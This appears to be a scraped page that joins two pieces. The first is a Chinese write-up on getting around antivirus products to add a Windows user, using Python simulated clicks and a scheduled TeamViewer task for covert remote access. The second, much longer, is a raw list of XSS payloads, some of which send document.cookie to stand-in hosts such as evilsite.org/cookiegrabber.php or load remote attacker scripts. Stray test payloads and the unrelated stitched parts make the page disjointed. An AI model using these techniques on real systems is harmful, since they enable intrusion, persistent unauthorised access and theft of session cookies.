This is a test:
<img src=x onerror=confirm(CoolCat)><plaintext/onmouseover=prompt("CoolCat")>
Bypass AVs to Add Users
嗯 这是一个企图Uninstall All AVs失败的产物
基本思路是模拟点击 输入
通过下面指令可运行360的卸载程序
cd "C:/Program Files/360/360safe/" & start uninst.exe
这程序的按钮有两个ShadowEdge保护
直接运行py脚本取点击会被拒绝
新建一个bat再用start来启动就可以绕过了
http://v.youku.com/v_show/id_XNDA1NzEyMzkyMA==.html?spm=a2h3j.8428770.3416059.1
如视频所示 模拟点击处最终确认按钮后无法点击
查阅资料得知这尼玛是360SPTools.exe设了很多阻碍 搞一天没突破
回念一想 不如直接添加用户 才有了本文
为了方便修改调整 采用Python做了本次任务的 不是每个目标上都有py的环境 所以手动配置咯
直接上传或使用下面脚本下载Python的embeddable版本到服务器(脚本不支持https 改半天实在没办法 需到Py官网下载后再上传到http的服务器上 带解压)
https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/download.php
由于需要用到pywin32
模块 该模块无法使用pip安装所以顺便安装一下
pip:
start python.exe ../get-pip.py
(踩坑经验:先修改环境目录下的python37._pth
文件,去掉 #import site 前的注释再执行命令 否则也无法安装成功 不使用start来运行也安装不成功)
pywin32:
start python.exe -m pip install pywin32
执行完所有需要的依赖也就安装好了 无需GUI即可完成。
刚开始是想通过控制面板添加用户 可以通过脚本执行control userpasswords
打开控制面板 但是步骤不叫繁琐 而且进程是explore
窗口不好控制。
可通过lusrmgr.msc
(本地用户和组管理工具)来做。
打开后需要计算图中中间那个"用户"按钮的位置 经过测试发现 它到顶端的距离和到坐标的距离无人为调整的话是不会边的 所有可获取该窗口左上角点的坐标来计算其坐标
#输出MMCMainFrame的窗口名称
MMCMainFrame = win32gui.FindWindow("MMCMainFrame", None)
# print("#######################")
titlename = (win32gui.GetWindowText(MMCMainFrame))
# print(titlename)
# print("#######################")
hWndChildList = []
a = win32gui.EnumChildWindows(MMCMainFrame, lambda hWnd, param: param.append(MMCMainFrame), hWndChildList)
# print(a)
#获取窗口左上角和右下角坐标
a, b, c, d = win32gui.GetWindowRect(MMCMainFrame)
a, b,即为需要的值
# 计算得出MMCMainFrame窗口的顶边距离“用户”这个标签120个坐标点 该值除非调动 否则不变
# userPosH = 237 -117
# print(userPosL)
# userPosL = 120
#计算得出MMCMainFrame窗口的坐标边距离“用户”这个标签120个坐标点 该值除非调动 否则不变
# userPosH = 1145 - 915
# print(userPosH)
# userPosH = 230
(a + 230, b + 120 )即为需要的值 实战中如有出入可采用PIL模块截图回传下来计算。
剩下的就是常规的模拟点击 模拟输入 完整代码见:
https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/adduser.py
360全家桶 安全狗 D盾 :
原视频在附件压缩包:
http://v.youku.com/v_show/id_XNDA1NzEyNTc1Ng==.html?spm=a2h3j.8428770.3416059.1
(云锁要求必须在服务区上安装 故尚未测试)
添加用户后如果服务器没开3389可上传一个单文件版本的teamviewer
再通过下面指令运行起来
schtasks /create /sc minute /mo 1 /tn “cat” /tr TV的路径 /ru 创建的用户名 /rp 创建的密码
使用PIL截图获取连接ID密码:
from PIL import ImageGrab
im = ImageGrab.grab()
im.save('screenshot.png')
如此一来就不用任何0day 全程合法文件的取得了远程桌面的权限。
This is a test:
<img src=x onerror=confirm(CoolCat)><plaintext/onmouseover=prompt("CoolCat")>
test:
"/><img src=x onerror=alert('test')/>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/
javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/
javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/
--></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><script>alert(String.fromCharCode(88,83,83))</script>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> / alert(1)//
'">><marquee></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/
javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/
javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/
--></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/*
< script > < / script>
<
<
<
<
<
<<
<<<
"><script>"</p>
<p><script>alert("XSS")</script>
<<script>alert("XSS");//<</script>
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
";alert('XSS');//
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
<script>alert(document.cookie);</script>
<script>alert(document.cookie);<script>alert
<xss><script>alert('XSS')</script></vulnerable></xss>
IMG%20SRC='javascript:alert(document.cookie)'
<IMG SRC="javascript:alert('XSS')"
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("'XSS'")
>
<IMG """><script>alert("XSS")</script>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc ript:alert(document.cookie)'>
IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<script>alert(String.fromCharCode(88,83,83))</script>=&{}
'';!--"<xss>=&{()}</xss>
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo>SCRIPT]]>alert('XSS');/SCRIPT]]></foo>
<xml ID=I><x><c><![CDATA[]]></c></x>
<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<img language=vbs src=<b onerror=alert#1/1#>
Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'
Reverse 401 basic auth phishing by @jackmasa POC:
document.domain='com' chrome/safari same domain suffix cross-domain trick.
Safari empty location bar bug by @jackmasa POC:
Safari location object pollution tech: by @kinugawamasato
Safari URL spoofing about://mmme.me POC:
Opera URL spoofing vuln data://mmme.me by @jackmasa POC:
Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera
New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F
Opera data:message/rfc822 #XSS by @insertScript
IE cool expression xss
<iframe srcdoc="<svg/onload=alert(/@80vul/)>"> #chrome</p> </iframe>
IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri
<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox
<script for= event=onerror()>alert(/@ma1/)</script><img id= src=> #IE
"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato
Components.lookupMethod(self, 'alert')(1) #firefox
external.NavigateAndFind(' ',[],[]) #IE #URLredirect
<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke
<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera
<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome
<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript<br>
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox</p>
<p><svg></ y="><x" onload=alert('@0x6D6172696F')> #svg<br>
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera<br>
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa<br>
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake<br>
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com<br>
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa<br>
$=<>@mozilla.org/js/function</>;$::<a href="/@superevr/"><>alert</></a> #firefox<br>
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa</p>
<p><svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #Firefox #JustForFun
Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>
<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>
<input #ie="" #xss<br="" >="" value="--><body/onload=<code>alert(/ @jackmasa /)//</code>">
Input[hidden] XSS <input type=hidden style=x:expression(alert(/ @garethheyes /))
> target it.
Firefox clipboard-hijack without script and css : http://
<![<img src=x:x onerror=alert(/ @jackmasa /)//
]-->
({})[$='\143\157\156\163\164\162\165\143\164\157\162']$()
No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe>
<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar</svg>
![if<iframe/onload=vbs::alert[:] #IE by @0x6D6172696F, @jackmasa
<svg>script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊= mix! #opera by @jackmasa</svg>
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS
header('Refresh: 0;url=javascript:alert(1)');
<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">
click
HTML5 entity char test
innerText DOM XSS: innerHTML=innerText
Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.
jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')
IE all version CSRF vector <img lowsrc=//blog.zsec.uk>
Timing vector <img src=//ixss.sinaapp.com/sleep.php>
Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>"><br>
IE9 <script/onload=alert(1)></script><br>
Webkit and FF <style/onload=alert(1)><br>
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P<br>
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')<br>
If you want to share your cool vector, please do not hesitate to let me know :)<br>
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL</p>
<p><iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F<br>
try{*}catch(e if(alert(1))){} by @garethheyes<br>
ß=ss <a href="http://ß.lv">click</a> by @_cweb<br>
<a href="http://www。example。com">click</a> by @_cweb<br>
Firefox link host dom xss <a href="https://t.co/aTtzHaaG">https://t.co/aTtzHaaG</a> by @garethheyes<br>
<a href="http://www﹒example﹒com ">click</a> by @_cweb<br>
history.pushState([],[],'/xssvector') HTML5 URL spoofing!<br>
Clickjacking with history.forward() and history.back() by @lcamtuf<br>
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul<br>
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356<br>
Firefox <img src=javascript:while([{}]);><br>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115<br>
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes</p>
<p><script>var location={};</script><br>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script><br>
Firefox <iframe src=view-source://xxxx.com>; with drag and drop</p>
<p><button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking <img src='//evil by @lcamtuf<br>
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
DOM clobbering:<form name=location > clobbered location object on IE.
DOM clobbering:<form name=document><image name=body> clobbered document->body
<isindex formaction=javascript:alert(1)> by @jackmasa
Classic IE backtick DOM XSS: <script>document.body.innerHTML=''</script>
Firefox click=>google by @garethheyes
click by @kkotowicz
Opera click variant base64 encode. by @jackmasa
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88</svg>
Webkit and Opera click
FF click url trick by @jackmasa
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
click
FF no referrer by @sneak_
No dos expression vector <i style=x:expression(alert(URL=1))>
<svg><style>*{font-family:'<svg onload="alert(1)">';}</svg></style></svg>
JSLR( @garethheyes ) challenge result:
@irsdl challenge result:
Vbscript XHR by @masa141421356
XML Entity XSS by @garethheyes
Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa
<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes
IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F
JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke
<meta content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]" http-equiv="refresh"> IE6-7 Inject vector by @kinugawamasato
IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes
<svg><script>a='<svg onload="alert(1)"></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa</script></svg>
Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F</svg>
<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes
FF CLICK by @0x6D6172696F
<noscript> by @jackmasa H5SC:
click non-IE
click Firefox
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute!
<embed allowscriptaccess="always" code="http://businessinfo.co.uk/labs/xss/xss.swf">
"><script>alert(0)</script>
<script src="http://yoursite.com/your_files.js"></script>
<script>alert(/xss/)</script>
<script>alert(/xss/)</script>
<font style="color:expression(alert(document.cookie))">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<scr<script>ipt>alert('XSS');ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<style>@import'javascript:alert("XSS")';</style>
alert("XSS")'); ?>
<marquee><script>alert('XSS')</script></marquee>
window.alert("Bonjour !");
</scr<script></font></noscript>
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X nS nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<input src="javascript:alert('XSS');" type="IMAGE">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<noalert><noscript>(123)</noscript><script>(123)</script></noalert>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")
>
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
SCRIPT/SRC="http://blog.zsec.uk/xss.js"</SCRIPT>
<<script>alert("XSS");//<</script>
<SCRIPT SRC=//blog.zsec.uk/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://blog.zsec.uk/scriptlet.html <
";alert('XSS');//
</TITLE><script>alert("XSS");</script>
<input src="javascript:alert('XSS');" type="IMAGE">
<style>li {list-style-image: url("javascript:alert('XSS')");}</style>
<BODY ONLOAD=alert('XSS')>
<bgsound src="javascript:alert('XSS');"></bgsound>
<link href="javascript:alert('XSS');" rel="stylesheet">
<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">
<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>
<meta content="<http://blog.zsec.uk/xss.css>; REL=stylesheet" http-equiv="Link">
<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>
<STYLE>@import'javascript:alert("XSS")';</STYLE>
<style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
<xss style="xss:expression(alert('XSS'))"></xss>
<xss style="behavior: url(xss.htc);">
<a href="javascript:alert(-1)">hello</a>
<a href="javascript:alert(-1)"
Hello
<a <!-- href="javascript:alert(31337);">Hello</a>
<map name="planetmap"><area a-=">" coords="0,0,145,126" href="javascript:alert(-1)" shape="rect"></map></xss>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
" onhover="javascript:alert(-1)"
"><script>alert('test')</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><script>alert(String.fromCharCode(88,83,83))</script>
<SCRIPT SRC=http://blog.zsec.uk/xss.js></SCRIPT>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")
>
<IMG """><script>alert("XSS")</script>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
<SCRIPT/XSS SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
<<script>alert("XSS");//<</script>
<SCRIPT SRC=http://blog.zsec.uk/xss.js?
<SCRIPT SRC=//blog.zsec.uk/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://blog.zsec.uk/scriptlet.html <
<script>a=/XSS/
alert(a.source)</script>
";alert('XSS');//
</TITLE><script>alert("XSS");</script>
<input src="javascript:alert('XSS');" type="IMAGE">
<BODY ONLOAD=alert('XSS')>
<bgsound src="javascript:alert('XSS');"></bgsound>
<layer src="http://blog.zsec.uk/ scriptlet.html"></layer>
<link href="javascript:alert('XSS');" rel="stylesheet">
<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">
<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>
<meta content="<http://blog.zsec.uk/xss.css>; REL=stylesheet" http-equiv="Link">
<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>
<xss style="behavior: url(xss.htc);"></xss>
<style>li {list-style-image: url("javascript:alert('XSS')");}</style>
<meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">
<meta content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" http-equiv="refresh">
<meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">
<iframe src="javascript:alert('XSS');"></iframe>
<xss style="xss:expression(alert('XSS'))">
exp/<A STYLE='no\xss:noxss("**");
xss:ex/XSS*//**pression(alert("XSS"))'></xss>
<style type="text/javascript">alert('XSS');</style>
<style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
<!--[if gte IE 4]>
<script>alert('XSS');</script>
<![endif]-->
<base href="javascript:alert('XSS');//">
<object data="http://blog.zsec.uk/scriptlet.html" type="text/x-scriptlet"></object>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<embed allowscriptaccess="always" src="http://blog.zsec.uk/xss.swf">
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://blog.zsec.uk/xss.htc">
<XML ID=I><x><c>]]> </c></x></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
<script src="http://blog.zsec.uk/xss.jpg"></script>
<meta content="USERID=<SCRIPT>alert('XSS')</SCRIPT>" http-equiv="Set-Cookie">
<meta content="text/html; charset=UTF-7" http-equiv="CONTENT-TYPE"> <script>alert('XSS');</script>
<script a=">" src="http://blog.zsec.uk/xss.js"></script>
<SCRIPT =">" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<SCRIPT a=>
SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<script a=">'>" src="http://blog.zsec.uk/xss.js"></script>
<script>document.write("<SCRI");</script>PT SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<iframe %00 src=" javascript:prompt(1) "%00>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'</style></svg>
<input/onmouseover="javaSCRIPT:confirm(1)"
<svg><scRipt %00>alert(1) {Opera}</svg>
<img/src=%00
onerror=this.onerror=confirm
%00
onerror=alert(1)
<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?
iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="
<script /%00/>/%00/alert(1)/%00/</script /%00/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>"
<meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh">
<svg><script xlink:href=data:,window.open('https://www.blog.zsec.uk/')></script</svg>
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}</svg>
<meta content="0;url=javascript:confirm(1)" http-equiv="refresh">
<iframe src=javascript:alert(document.location)>
<iframe
src="javascript:alert(1)"
;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@
onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script
</style ><script :-(>//alert(document.location)//</script :-(
�</form><input type="date" onfocus="alert(1)">
<textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script //>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //
<iframe srcdoc="<body onload=prompt(1)>"><br>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a></p>
<p><script <del>~>alert(0%0)</script ~</del>></p>
<p><style/onload=<!--	> alert (1)><br>
<///style///><span %2F onmousemove='alert(1)'>SPAN<br>
<img/src='<a href="http://i.imgur.com/P8mL8.jpg">http://i.imgur.com/P8mL8.jpg</a>' onmouseover=	prompt(1)<br>
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'<br>
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}</p>
<p><marquee onstart='javascript:alert(1)'>^__^</p>
<p><a href="div/style="width:expression(confirm(1))"">div/style="width:expression(confirm(1))"</a>X</div> {IE7}</p>
<p><iframe/%00/ src=javaSCRIPT:alert(1)<br>
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//<br>
/<em>iframe/src</em>/<a href="mailto:iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/">iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/</a><br>
//|\ <script //|\ src='<a href="https://dl.dropbox.com/u/13018058/js.js'>">https://dl.dropbox.com/u/13018058/js.js'></a> //|\ </script //|\<br>
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}<br>
<a href="javascript:\u0061le%72t(1)"><button></p>
<p><div onmouseover='alert(1)'>DIV</div></p>
<p><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"><br>
<a href="jAvAsCrIpT:alert(1)">X</a></p>
<p><embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"></p>
<p><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><br>
<var onmouseover="prompt(1)">On Mouse Over</var><br>
<a href=javascript:alert(document.cookie)>Click Here</a><br>
<img src="/" =_=" title="onerror='prompt(1)'"><br>
<%<!--'%><script>alert(1);</script --></p>
<p><script src="data:text/javascript,alert(1)"></script></p>
<p><iframe/src \/\/onload = prompt(1)</p>
<p><iframe/onreadystatechange=alert(1)</p>
<p><svg/onload=alert(1)</p>
<p><input value=<><iframe/src=javascript:confirm(1)</p>
<p><input type="text" value=`` <div/onmouseover='alert(1)'>X</div><br>
<a href="http://www">http://www</a>.<script>alert(1)</script .com</p>
<p><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe></p>
<p><svg><script ?>alert(1)</p>
<p><iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe><br>
<img src=<code>xx:xx</code>onerror=alert(1)></p>
<p><object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object></p>
<p><meta http-equiv="refresh" content="0;javascript:alert(1)"/></p>
<p><math><a xlink:href="//jsfiddle.net/t846h/">click</p>
<p><embed code="<a href="http://businessinfo.co.uk/labs/xss/xss.swf">http://businessinfo.co.uk/labs/xss/xss.swf</a>" allowscriptaccess=always></p>
<p><svg contentScriptType=text/vbs><script>MsgBox<br>
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a</p>
<p><iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE></p>
<p><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U</p>
<p><script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F</p>
<p><script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script</p>
<p><object data=javascript:\u0061l&#101%72t(1)></p>
<p><script>++1-+?(1)</script></p>
<p><body/onload=<!-->&#10alert(1)></p>
<p><script itworksinallbrowsers>/<em><script</em> */alert(1)</script<br>
<img src ?itworksonchrome?\/onerror = alert(1)</p>
<p><svg><script>//
confirm(1);</script </svg></p>
<p><svg><script onlypossibleinopera:-)> alert(1)<br>
